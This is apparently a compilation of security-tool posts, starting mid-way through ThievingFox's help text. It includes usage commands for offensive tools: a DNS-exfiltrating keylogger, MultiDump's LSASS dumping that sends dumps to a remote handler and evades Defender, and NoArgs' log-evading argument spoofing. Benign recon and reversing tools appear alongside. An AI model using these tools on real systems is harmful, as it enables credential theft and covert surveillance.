    --keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
    --keepassxc-path KEEPASSXC_PATH
    The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
    --keepassxc-share KEEPASSXC_SHARE
    The share on which KeePassXC is installed (Default: c$)
    --mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
    --consent Try to cleanup all poisonning artifacts related to Consent.exe
    --logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
    --rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
    --mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
    --all Try to cleanup all poisonning artifacts related to all applications

    Collect

    For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

    Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

    $ python3 client/ThievingFox.py collect -h
    usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
    [--logonui] [--rdcman] [--mobaxterm] [--all]
    target

    positional arguments:
    target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

    options:
    -h, --help show this help message and exit
    -hashes HASHES, --hashes HASHES
    LM:NT hash
    -aesKey AESKEY, --aesKey AESKEY
    AES key to use for Kerberos Authentication
    -k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
    -dc-ip DC_IP, --dc-ip DC_IP
    IP Address of th e domain controller
    -no-pass, --no-pass Do not prompt for password
    --tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
    --keepass Collect KeePass.exe logs
    --keepassxc Collect KeePassXC.exe logs
    --mstsc Collect mstsc.exe logs
    --consent Collect Consent.exe logs
    --logonui Collect LogonUI.exe logs
    --rdcman Collect RDCMan.exe logs
    --mobaxterm Collect MobaXTerm.exe logs
    --all Collect logs from all applications


    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



    Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0 Created BY BLACK-SCORP10 t.me/BLACK-SCORP10

    Features

    • Check the status of single or multiple URLs/domains.
    • Asynchronous HTTP requests for improved performance.
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.

    Installation

    1. Clone the repository:

    bash git clone https://github.com/your_username/status-checker.git cd status-checker

    1. Install dependencies:

    bash pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    C2-Tracker - Live Feed Of C2 Servers, Tools, And Botnets

    By: Zion3R


    Free to use IOC feed for various tools/malware. It started out for just C2 tools but has morphed into tracking infostealers and botnets as well. It uses shodan.io/">Shodan searches to collect the IPs. The most recent collection is always stored in data; the IPs are broken down by tool and there is an all.txt.

    The feed should update daily. Actively working on making the backend more reliable


    Honorable Mentions

    Many of the Shodan queries have been sourced from other CTI researchers:

    Huge shoutout to them!

    Thanks to BertJanCyber for creating the KQL query for ingesting this feed

    And finally, thanks to Y_nexro for creating C2Live in order to visualize the data

    What do I track?

    Running Locally

    If you want to host a private version, put your Shodan API key in an environment variable called SHODAN_API_KEY

    echo SHODAN_API_KEY=API_KEY >> ~/.bashrc
    bash
    python3 -m pip install -r requirements.txt
    python3 tracker.py

    Contributing

    I encourage opening an issue/PR if you know of any additional Shodan searches for identifying adversary infrastructure. I will not set any hard guidelines around what can be submitted, just know, fidelity is paramount (high true/false positive ratio is the focus).

    References



    NoArgs - Tool Designed To Dynamically Spoof And Conceal Process Arguments While Staying Undetected

    By: Zion3R


    NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.


    Default Cmd:


    Windows Event Logs:


    Using NoArgs:


    Windows Event Logs:


    Functionality Overview

    The tool primarily operates by intercepting process creation calls made by the Windows API function CreateProcessW. When a process is initiated, this function is responsible for spawning the new process, along with any specified command-line arguments. The tool intervenes in this process creation flow, ensuring that the arguments are either hidden or manipulated before the new process is launched.

    Hooking Mechanism

    Hooking into CreateProcessW is achieved through Detours, a popular library for intercepting and redirecting Win32 API functions. Detours allows for the redirection of function calls to custom implementations while preserving the original functionality. By hooking into CreateProcessW, the tool is able to intercept the process creation requests and execute its custom logic before allowing the process to be spawned.

    Process Environment Block (PEB) Manipulation

    The Process Environment Block (PEB) is a data structure utilized by Windows to store information about a process's environment and execution state. The tool leverages the PEB to manipulate the command-line arguments of the newly created processes. By modifying the command-line information stored within the PEB, the tool can alter or conceal the arguments passed to the process.

    Demo: Running Mimikatz and passing it the arguments:

    Process Hacker View:


    All the arguemnts are hidden dynamically

    Process Monitor View:


    Technical Implementation

    1. Injection into Command Prompt (cmd): The tool injects its code into the Command Prompt process, embedding it as Position Independent Code (PIC). This enables seamless integration into cmd's memory space, ensuring covert operation without reliance on specific memory addresses. (Only for The Obfuscated Executable in the releases page)

    2. Windows API Hooking: Detours are utilized to intercept calls to the CreateProcessW function. By redirecting the execution flow to a custom implementation, the tool can execute its logic before the original Windows API function.

    3. Custom Process Creation Function: Upon intercepting a CreateProcessW call, the custom function is executed, creating the new process and manipulating its arguments as necessary.

    4. PEB Modification: Within the custom process creation function, the Process Environment Block (PEB) of the newly created process is accessed and modified to achieve the goal of manipulating or hiding the process arguments.

    5. Execution Redirection: Upon completion of the manipulations, the execution seamlessly returns to Command Prompt (cmd) without any interruptions. This dynamic redirection ensures that subsequent commands entered undergo manipulation discreetly, evading detection and logging mechanisms that relay on getting the process details from the PEB.

    Installation and Usage:

    Option 1: Compile NoArgs DLL:

    • You will need microsoft/Detours">Microsoft Detours installed.

    • Compile the DLL.

    • Inject the compiled DLL into any cmd instance to manipulate newly created process arguments dynamically.

    Option 2: Download the compiled executable (ready-to-go) from the releases page.

    Refrences:

    • https://en.wikipedia.org/wiki/Microsoft_Detours
    • https://github.com/microsoft/Detours
    • https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
    • https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++


    Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

    By: Zion3R


    This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

    It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


    Advantages

    To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

    1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

    2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

    3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

    4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

    Installation

    1. You can simply download the stable versions from the release section, where you can also find the installer.

    2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
      You will find the binary in the folder bin\updater\updater.exe.

    Tool set

    This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
    Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
    You can check the complete list of tools here.

    About contributions

    Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



    R2Frida - Radare2 And Frida Better Together

    By: Zion3R


    This is a self-contained plugin for radare2 that allows to instrument remote processes using frida.

    The radare project brings a complete toolchain for reverse engineering, providing well maintained functionalities and extend its features with other programming languages and tools.

    Frida is a dynamic instrumentation toolkit that makes it easy to inspect and manipulate running processes by injecting your own JavaScript, and optionally also communicate with your scripts.


    Features

    • Run unmodified Frida scripts (Use the :. command)
    • Execute snippets in C, Javascript or TypeScript in any process
    • Can attach, spawn or launch in local or remote systems
    • List sections, symbols, exports, protocols, classes, methods
    • Search for values in memory inside the agent or from the host
    • Replace method implementations or create hooks with short commands
    • Load libraries and frameworks in the target process
    • Support Dalvik, Java, ObjC, Swift and C interfaces
    • Manipulate file descriptors and environment variables
    • Send signals to the process, continue, breakpoints
    • The r2frida io plugin is also a filesystem fs and debug backend
    • Automate r2 and frida using r2pipe
    • Read/Write process memory
    • Call functions, syscalls and raw code snippets
    • Connect to frida-server via usb or tcp/ip
    • Enumerate apps and processes
    • Trace registers, arguments of functions
    • Tested on x64, arm32 and arm64 for Linux, Windows, macOS, iOS and Android
    • Doesn't require frida to be installed in the host (no need for frida-tools)
    • Extend the r2frida commands with plugins that run in the agent
    • Change page permissions, patch code and data
    • Resolve symbols by name or address and import them as flags into r2
    • Run r2 commands in the host from the agent
    • Use r2 apis and run r2 commands inside the remote target process.
    • Native breakpoints using the :db api
    • Access remote filesystems using the r_fs api.

    Installation

    The recommended way to install r2frida is via r2pm:

    $ r2pm -ci r2frida

    Binary builds that don't require compilation will be soon supported in r2pm and r2env. Meanwhile feel free to download the last builds from the Releases page.

    Compilation

    Dependencies

    • radare2
    • pkg-config (not required on windows)
    • curl or wget
    • make, gcc
    • npm, nodejs (will be soon removed)

    In GNU/Debian you will need to install the following packages:

    $ sudo apt install -y make gcc libzip-dev nodejs npm curl pkg-config git

    Instructions

    $ git clone https://github.com/nowsecure/r2frida.git
    $ cd r2frida
    $ make
    $ make user-install

    Windows

    • Install meson and Visual Studio
    • Unzip the latest radare2 release zip in the r2frida root directory
    • Rename it to radare2 (instead of radare2-x.y.z)
    • To make the VS compiler available in PATH (preconfigure.bat)
    • Run configure.bat and then make.bat
    • Copy the b\r2frida.dll into r2 -H R2_USER_PLUGINS

    Usage

    For testing, use r2 frida://0, as attaching to the pid0 in frida is a special session that runs in local. Now you can run the :? command to get the list of commands available.

    $ r2 'frida://?'
    r2 frida://[action]/[link]/[device]/[target]
    * action = list | apps | attach | spawn | launch
    * link = local | usb | remote host:port
    * device = '' | host:port | device-id
    * target = pid | appname | process-name | program-in-path | abspath
    Local:
    * frida://? # show this help
    * frida:// # list local processes
    * frida://0 # attach to frida-helper (no spawn needed)
    * frida:///usr/local/bin/rax2 # abspath to spawn
    * frida://rax2 # same as above, considering local/bin is in PATH
    * frida://spawn/$(program) # spawn a new process in the current system
    * frida://attach/(target) # attach to target PID in current host
    USB:
    * frida://list/usb// # list processes in the first usb device
    * frida://apps/usb// # list apps in the first usb device
    * frida://attach/usb//12345 # attach to given pid in the first usb device
    * frida://spawn/usb//appname # spawn an app in the first resolved usb device
    * frida://launch/usb//appname # spawn+resume an app in the first usb device
    Remote:
    * frida://attach/remote/10.0.0.3:9999/558 # attach to pid 558 on tcp remote frida-server
    Environment: (Use the `%` command to change the environment at runtime)
    R2FRIDA_SAFE_IO=0|1 # Workaround a Frida bug on Android/thumb
    R2FRIDA_DEBUG=0|1 # Used to debug argument parsing behaviour
    R2FRIDA_COMPILER_DISABLE=0|1 # Disable the new frida typescript compiler (`:. foo.ts`)
    R2FRIDA_AGENT_SCRIPT=[file] # path to file of the r2frida agent

    Examples

    $ r2 frida://0     # same as frida -p 0, connects to a local session

    You can attach, spawn or launch to any program by name or pid, The following line will attach to the first process named rax2 (run rax2 - in another terminal to test this line)

    $ r2 frida://rax2  # attach to the first process named `rax2`
    $ r2 frida://1234 # attach to the given pid

    Using the absolute path of a binary to spawn will spawn the process:

    $ r2 frida:///bin/ls
    [0x00000000]> :dc # continue the execution of the target program

    Also works with arguments:

    $ r2 frida://"/bin/ls -al"

    For USB debugging iOS/Android apps use these actions. Note that spawn can be replaced with launch or attach, and the process name can be the bundleid or the PID.

    $ r2 frida://spawn/usb/         # enumerate devices
    $ r2 frida://spawn/usb// # enumerate apps in the first iOS device
    $ r2 frida://spawn/usb//Weather # Run the weather app

    Commands

    These are the most frequent commands, so you must learn them and suffix it with ? to get subcommands help.

    :i        # get information of the target (pid, name, home, arch, bits, ..)
    .:i* # import the target process details into local r2
    :? # show all the available commands
    :dm # list maps. Use ':dm|head' and seek to the program base address
    :iE # list the exports of the current binary (seek)
    :dt fread # trace the 'fread' function
    :dt-* # delete all traces

    Plugins

    r2frida plugins run in the agent side and are registered with the r2frida.pluginRegister API.

    See the plugins/ directory for some more example plugin scripts.

    [0x00000000]> cat example.js
    r2frida.pluginRegister('test', function(name) {
    if (name === 'test') {
    return function(args) {
    console.log('Hello Args From r2frida plugin', args);
    return 'Things Happen';
    }
    }
    });
    [0x00000000]> :. example.js # load the plugin script

    The :. command works like the r2's . command, but runs inside the agent.

    :. a.js  # run script which registers a plugin
    :. # list plugins
    :.-test # unload a plugin by name
    :.. a.js # eternalize script (keeps running after detach)

    Termux

    If you are willing to install and use r2frida natively on Android via Termux, there are some caveats with the library dependencies because of some symbol resolutions. The way to make this work is by extending the LD_LIBRARY_PATH environment to point to the system directory before the termux libdir.

    $ LD_LIBRARY_PATH=/system/lib64:$LD_LIBRARY_PATH r2 frida://...

    Troubleshooting

    Ensure you are using a modern version of r2 (preferibly last release or git).

    Run r2 -L | grep frida to verify if the plugin is loaded, if nothing is printed use the R2_DEBUG=1 environment variable to get some debugging messages to find out the reason.

    If you have problems compiling r2frida you can use r2env or fetch the release builds from the GitHub releases page, bear in mind that only MAJOR.MINOR version must match, this is r2-5.7.6 can load any plugin compiled on any version between 5.7.0 and 5.7.8.

    Design

     +---------+
    | radare2 | The radare2 tool, on top of the rest
    +---------+
    :
    +----------+
    | io_frida | r2frida io plugin
    +----------+
    :
    +---------+
    | frida | Frida host APIs and logic to interact with target
    +---------+
    :
    +-------+
    | app | Target process instrumented by Frida with Javascript
    +-------+

    Credits

    This plugin has been developed by pancake aka Sergi Alvarez (the author of radare2) for NowSecure.

    I would like to thank Ole AndrΓ© for writing and maintaining Frida as well as being so kind to proactively fix bugs and discuss technical details on anything needed to make this union to work. Kudos



    Cloud_Enum - Multi-cloud OSINT Tool. Enumerate Public Resources In AWS, Azure, And Google Cloud

    By: Zion3R


    Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.

    Currently enumerates the following:

    Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)

    Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps

    Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps


    See it in action in Codingo's video demo here.


    Usage

    Setup

    Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:

    pip3 install -r ./requirements.txt

    Running

    The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

    You can provide multiple keywords by specifying the -k argument multiple times.

    Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

    Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

    ./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

    HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

    ./cloud_enum.py -k keyword -t 10

    IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

    Complete Usage Details

    usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

    Multi-cloud enumeration utility. All hail OSINT!

    optional arguments:
    -h, --help show this help message and exit
    -k KEYWORD, --keyword KEYWORD
    Keyword. Can use argument multiple times.
    -kf KEYFILE, --keyfile KEYFILE
    Input file with a single keyword per line.
    -m MUTATIONS, --mutations MUTATIONS
    Mutations. Default: enum_tools/fuzz.txt
    -b BRUTE, --brute BRUTE
    List to brute-force Azure container names. Default: enum_tools/fuzz.txt
    -t THREADS, --threads THREADS
    Threads for HTTP brute-force. Default = 5
    -ns NAMESERVER, --nameserver NAMESERVER
    DNS server to use in brute-force.
    -l LOGFILE, --logfile LOGFILE
    Will APPEND found items to specified file.
    -f FORMAT, --format FORMAT
    Format for log file (text,json,csv - defaults to text)
    --disable-aws Disable Amazon checks.
    --disable-azure Disable Azure checks.
    --disable-gcp Disable Google checks.
    -qs, --quickscan Disable all mutations and second-level scans

    Thanks

    So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


    Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.

    Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

    • Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

    Noia is powered by frida.re, thus requires Frida to run.

    Rooted Device

    See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

    Non-rooted Device

    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

    This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

    LICENCE

    MIT



    DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

    By: Zion3R


    This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

    These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.


    Server

    Setup

    The server uses python3.

    To install dependencies, run python3 -m pip install -r requirements.txt

    Starting the Server

    To start the server, run python3 main.py

    usage: dns exfiltration server [-h] [-p PORT] ip domain

    positional arguments:
    ip
    domain

    options:
    -h, --help show this help message and exit
    -p PORT, --port PORT port to listen on

    By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

    ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

    domain is the domain to listen for, which should be the domain that the server is authoritative for.

    Registrar

    On the registrar, you want to change your domain's namespace to custom DNS.

    Point them to two domains, ns1.example.com and ns2.example.com.

    Add records that make point the namespace domains to your exfiltration server's IP address.

    This is the same as setting glue records.

    Client

    Linux

    The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

    logger.sh

    # Usage: logger.sh [-options] domain
    # Positional Arguments:
    # domain: the domain to send data to
    # Options:
    # -p path: give path to log file to listen to
    # -l: run the logger with warnings and errors printed

    To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

    The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

    The -l option will show warnings and errors. Can be useful for debugging.

    logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

    connection.sh

    Usage: command [-options] domain
    Positional Arguments:
    domain: the domain to send data to
    Options:
    -n: number of characters to store before sending a packet

    Windows

    Build

    To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

    make production domain=example.com

    You can also choose to build the program with debugging by making the debug target.

    make debug domain=example.com

    For both targets, you will need to specify the domain the server is listening for.

    Sending Test Requests

    You can use dig to send requests to the server:

    dig @127.0.0.1 a.1.1.1.example.com A +short send a connection request to a server on localhost.

    dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short send a test message to localhost.

    Replace example.com with the domain the server is listening for.

    Protocol

    Starting a Connection

    A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

    The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

    The server will respond with an IP address in following format: 123.123.123.[id]

    Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

    Exfiltrating Data

    A record requests starting with b indicate exfiltrated data being sent to the server.

    The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

    The server will respond with [code].123.123.123

    id is the id that was established on connection. Data is sent as ASCII encoded in hex.

    code is one of the codes described below.

    Response Codes

    200: OK

    If the client sends a request that is processed normally, the server will respond with code 200.

    201: Malformed Record Requests

    If the client sends an malformed record request, the server will respond with code 201.

    202: Non-Existant Connections

    If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

    203: Out of Order Packets

    If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

    204 Reached Max Connection

    If the client attempts to create a connection when the max has reached, the server will respond with code 204.

    Dropped Packets

    Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

    Side Notes

    Linux

    Log File

    The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

    Non-Interactive Shells

    The keylogger relies on script, so the keylogger won't run in non-interactive shells.

    Windows

    Repeated Requests

    For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



    MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly

    By: Zion3R


    MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

    Blog post: https://xre0us.io/posts/multidump


    MultiDump supports LSASS dump via ProcDump.exe or comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

    Usage

        __  __       _ _   _ _____
    | \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
    | |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
    | | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
    |_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
    |_|

    Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

    -p Path to save procdump.exe, use full path. Default to temp directory
    -l Path to save encrypted dump file, use full path. Default to current directory
    -r Set ip:port to connect to a remote handler
    --procdump Writes procdump to disk and use it to dump LSASS
    --nodump Disable LSASS dumping
    --reg Dump SAM, SECURITY and SYSTEM hives
    --delay Increase interval between connections to for slower network speeds
    -v Enable v erbose mode

    MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
    Examples:
    MultiDump.exe -l C:\Users\Public\lsass.dmp -v
    MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
    usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

    Handler for RemoteProcDump

    options:
    -h, --help show this help message and exit
    -r REMOTE, --remote REMOTE
    Port to receive remote dump file
    -l LOCAL, --local LOCAL
    Local dump file, key needed to decrypt
    --sam SAM Local SAM save, key needed to decrypt
    --security SECURITY Local SECURITY save, key needed to decrypt
    --system SYSTEM Local SYSTEM save, key needed to decrypt
    -k KEY, --key KEY Key to decrypt local file
    --override-ip OVERRIDE_IP
    Manually specify the IP address for key generation in remote mode, for proxied connection

    As with all LSASS related tools, Administrator/SeDebugPrivilege priviledges are required.

    The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your enviroment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.

    By default, MultiDump uses the Comsvc.dll method and saves the encrypted dump in the current directory.

    MultiDump.exe
    ...
    [i] Local Mode Selected. Writing Encrypted Dump File to Disk...
    [i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
    [i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
    ./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

    If --procdump is used, ProcDump.exe will be writtern to disk to dump LSASS.

    In remote mode, MultiDump connects to the handler's listener.

    ./ProcDumpHandler.py -r 9001
    [i] Listening on port 9001 for encrypted key...
    MultiDump.exe -r 10.0.0.1:9001

    The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.

    An additional option to dump the SAM, SECURITY and SYSTEM hives are available with --reg, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.

    Building MultiDump

    Open in Visual Studio, build in Release mode.

    Customising MultiDump

    It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them, to do so, another Visual Studio project EncryptionHelper, is included. Simply change the key or strings and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

    Self deletion can be toggled by uncommenting the following line in Common.h:

    #define SELF_DELETION

    To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

    //#define DEBUG

    MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of), the investigation and implementation deserves a blog post itself: https://xre0us.io/posts/saving-lsass-from-defender/

    Credits



    mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite

    By: Zion3R


    mapXplore is a modular application that imports data extracted of the sqlmap to PostgreSQL or SQLite database.

    Its main features are:

    • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
    • Sanitized information, which means that at the time of import, it decodes or transforms unreadable information into readable information.
    • Search for information in all tables, such as passwords, users, and desired information.
    • Automatic export of information stored in base64, such as:

      • Word, Excel, PowerPoint files
      • .zip files
      • Text files or plain text information
      • Images
    • Filter tables and columns by criteria.

    • Filter by different types of hash functions without requiring prior conversion.
    • Export relevant information to Excel or HTML

    Installation

    Requirements

    • python-3.11
    git clone https://github.com/daniel2005d/mapXplore
    cd mapXplore
    pip install -r requirements

    Usage

    It is a modular application, and consists of the following:

    • config: It is responsible for configuration, such as the database engine to use, import paths, among others.
    • import: It is responsible for importing and processing the information extracted from sqlmap.
    • query: It is the main module capable of filtering and extracting the required information.
      • Filter by tables
      • Filter by columns
      • Filter by one or more words
      • Filter by one or more hash functions within which are:
        • MD5
        • SHA1
        • SHA256
        • SHA3
        • ....

    Beginning

    Allows loading a default configuration at the start of the program

    python engine.py [--config config.json]

    Modules



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


    During reconaissance phase or when doing OSINT , we often use google dorking and shodan and thus the idea of Dorkish.
    Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using the builder and it offers prebuilt dorks for efficient reconnaissance and OSINT engagement.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

    2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
    3- click on Load unpacked extension button and select the dorkish folder.

    Note: For firefox users , you can find the extension here : https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

    • Builder with keywords to filter your google search results.
    • Prebuilt dorks for Bug bounty programs.
    • Prebuilt dorks used during the reconnaissance phase in bug bounty.
    • Prebuilt dorks for exposed files and directories
    • Prebuilt dorks for logins and sign up portals
    • Prebuilt dorks for cyber secruity jobs

    Shodan dorking

    • Builder with filter keywords used in shodan.
    • Varierty of prebuilt dorks to find IOT , Network infrastructure , cameras , ICS , databases , etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

    TODO

    • Add more useful dorks and catogories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

    I have built some dorks and I have used some public resources to gather the dorks , here's few : - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


